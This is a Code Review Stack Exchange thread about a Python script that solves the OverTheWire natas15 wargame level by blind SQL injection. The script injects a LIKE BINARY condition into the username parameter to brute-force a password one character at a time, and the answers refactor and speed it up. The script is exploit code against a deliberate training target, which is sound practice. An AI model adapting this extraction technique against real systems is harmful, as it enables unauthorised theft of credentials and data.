# natas15 blind SQL injection

Tags: python, programming-challenge, python-3.x

I've been having fun with *natas*, a wargame, from [overthewire](http://overthewire.org/wargames/natas/).

This is another script I made to pass stage 15. I'm using Python with SQL injection to find the password for the next level.

I think the program is short, and easy to understand. But maybe I could have done a few things even better.

**Any** review is welcome!

```
import string
import requests

POSSIBLE_CHARS = string.ascii_letters + string.digits
URL = 'http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/'

def blind_sql():
    password = ''
    correct_guess = b'This user exists.'

    # Because all natas passwords were 32 char long
    for i in range(32): 
        for char in POSSIBLE_CHARS:
            sql = f'{URL}?username=natas16" AND password LIKE BINARY "{password}{char}%'
            if requests.get(sql).content.find(correct_guess) != -1:
                password += char
                break

    return f'Password = {password}'

if __name__ == '__main__':
    if requests.get(URL).status_code == requests.codes.ok:
        print(blind_sql())
    else:
        print('Authentication failed!')
```

Comment: @Rcihard Neumann Because the password is 32 chars long (I know from previous challanges). So I need to  find the next char in the pass 32 times.

Answer (score 5, accepted):

Your code is pretty good. It's as far as I'd go for a challenge, however since this is Code Review, I'd possibly do:

- As @[Richard Neumann](https://codereview.stackexchange.com/users/51621/richard-neumann) correctly points out your code is a little difficult to understand.

  > What is the `for i in range(32):` loop for? You never use `i` and it is not obvious why you repeat the subordinate `for char in POSSIBLE_CHARS:` loop 32 times.

  If however you made a function called `is_partial_password`, then your loop would make much more sense.
- It's kinda uncommon to see bytes, or I'm not working in the correct field to see them. And so you may want to use `requests.get(...).text`. (This currently comes purely down to preference.)
- You don't have to use `bytes.find`, instead use `in` on either a `str` or `bytes`.
- You may prefer using `next`, rather than a `for` loop to add to the password. However, you may not.
- You may want to change `blind_sql` to `get_password`, with the appropriate parameters.

This can get:

```
import string
import requests

POSSIBLE_CHARS = string.ascii_letters + string.digits
URL = 'http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/'

def is_partial_password(password):
    r = requests.get(f'{URL}?username=natas16" AND password LIKE BINARY "{password}%')
    return 'This user exists.' in r.text

def get_password(char_set, length):
    password = ''
    for _ in range(length):
        password += next(char for char in char_set if is_partial_password(password + char))
    return password

if __name__ == '__main__':
    if requests.get(URL).status_code == requests.codes.ok:
        print(f'Password = {get_password(POSSIBLE_CHARS, 32)}')
    else:
        print('Authentication failed!')
```

Comment: I'm still a bit hazy on `requests` I agree the `find()` is unnecessary, would be more explicit with the `in` keyword

Comment: @Ludisposed Thanks, it seems I changed it twice, :) If by "I'm still a bit hazy on `requests`" you mean the `str` vs. `bytes` part, that is purely down to choice, :)

Comment: @Peillonrayz Yes that is what I meant, and I do like the `str`more, because to my knowledge it is faster as `find`. I do however think my solution is faster, because I `break` after finding a correct `char`, while you keep iterating over the `char_set` untill the end

Comment: @Ludisposed My code and your code is roughly the same in terms of speed there, as `next` is running on a generator comprehension, so it stops at the first match.

Comment: change `for _ in range(length)` in `get_password` to `while len(password) < length`can be a bit faster (as I did this, actually just loop 24 times)

Answer (score 5):

You code is well-written.
You may want to

- add a docstring to the function
- rename the loop variable `i` to `_`, since it is not being used.

You may also want to consider using [`itertools.repeat`](https://docs.python.org/3.6/library/itertools.html#itertools.repeat), which [is said to be slightly faster](https://stackoverflow.com/a/2970789/3515670) than `for _ in range(N)`.

Comment: I haven't seen `itertools.repeat` being used like that. Very interesting stuff, but maybe trivial for something this short.

Answer (score 4):

A couple more possible performance improvements:

- [initialize `requests.Session()` and re-use](http://docs.python-requests.org/en/master/user/advanced/#session-objects), this should save some time since on consecutive HTTP requests it would re-use an underlying TCP connection:

  > if you're making several requests to the same host, the underlying TCP 
  >   connection will be reused, which can result in a significant performance increase
- you may also replace `.get()` with `.head()` for the initial request since you are checking the response status code only (not needing the body)